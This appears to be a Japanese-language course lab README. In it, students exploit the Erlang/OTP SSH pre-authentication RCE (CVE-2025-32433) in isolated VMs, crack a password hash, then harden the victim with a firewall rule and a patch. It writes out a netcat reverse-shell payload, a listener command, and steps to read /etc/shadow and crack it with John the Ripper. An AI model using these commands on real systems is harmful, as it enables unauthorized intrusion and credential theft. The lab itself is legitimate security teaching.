
このプロジェクトは、2台の仮想マシンにまたがる実際の攻防シナリオをシミュレートします。Erlang/OTP SSHサーバーの認証前の重大なRCE脆弱性(CVE-2025-32433)を悪用し、抽出したパスワードハッシュをクラックした後、ファイアウォールルールとパッチ適用で被害マシンを堅牢化します。
合計点数: 20 | 提出期限: 遅延提出は受け付けません
このプロジェクトは、2台の仮想マシンにわたる実際の攻撃防御シナリオをシミュレートします。Erlang/OTP SSHサーバーにおける重大な事前認証RCE脆弱性(CVE-2025-32433)を悪用し、抽出したパスワードハッシュをクラックし、その後、ファイアウォールルールとパッチ適用で被害マシンを強化します。
| 役割 | OS |
|---|---|
| 攻撃者 | Kali Linux |
| 被害者 | Ubuntu/Debian (Erlang/OTP SSH v27.3.2) |
| ファイル | 説明 |
|---|---|
Debian-1.ova | 事前構築済みの被害者VMイメージ — 個別にダウンロードしてください。リソースを参照 (GitHubには大きすぎる) |
Debian-1.ova): ダウンロードリンク — GitHubでホストするには大きすぎる(~3GB)。以下に説明するように個別にダウンロードしてVirtualBox/VMwareにインポートしてください。rockyou_txt.txt): このリポジトリに含まれており、Part 2のパスワードクラッキングステップで使用します。Debian-1.ova と自身のKali Linux VMをVirtualBox/VMwareに読み込みます。ifconfig を実行してIPを確認します(通常は 192.168.56.0/24 内)。nmap -p 2222 -sV -A <victim-IP>
Document open ports, service versions, and Erlang signatures.
一時的にKaliをNATに切り替えてリポジトリをクローンし、その後ホストオンリーに戻します。
git clone https://github.com/ProDefense/CVE-2025-32433.git
cd CVE-2025-32433
sudo nano CVE-2025-32433.py
Edit the script — set HOST = "<victim-IP>" and update the payload:
command='os:cmd("nc -e /bin/bash <Kali-IP> 4444").'
Terminal 1 (Kali) — start listener:
nc -lvnp 4444
Terminal 2 (Kali) — launch exploit:
python3 CVE-2025-32433.py
In the reverse shell, run whoami and hostname to confirm access.
# On victim (via reverse shell)
cat /etc/shadow | grep testuser > hash.txt
# On Kali
john --wordlist=rockyou_txt.txt hash.txt
ハッシュ形式(例: $6$ = SHA-512)、所要時間、および復元された平文パスワードを記録します。
find / -iname "flag.txt" 2>/dev/null
cat /path/to/flag.txt
sudo iptables -A INPUT -p tcp --dport 2222 -j DROP
KaliからNmapスキャンとエクスプロイトを再実行し、ポート2222が"Filtered"になりエクスプロイトが失敗することを記録します。
CVE-2025-32433の修正を含むErlang/OTPをv27.3.3以降にアップグレードする手順を記録します。
whoami/hostname)、フラグ取得のスクリーンショットを含む完全なレポートCVE-2025-32433 — Erlang/OTP SSHサーバーにおける重大な事前認証リモートコード実行。認証情報交換前に不正なSSHパケットを送信することで悪用可能であり、認証されていない攻撃者に完全なシェルアクセスを許します。
Project Spring 2026 - Google Docs.pdf |
| 成果物を含む完全なプロジェクト指示書 |
rockyou_txt.txt | John the Ripperで抽出されたパスワードハッシュをクラックするために使用されるワードリスト |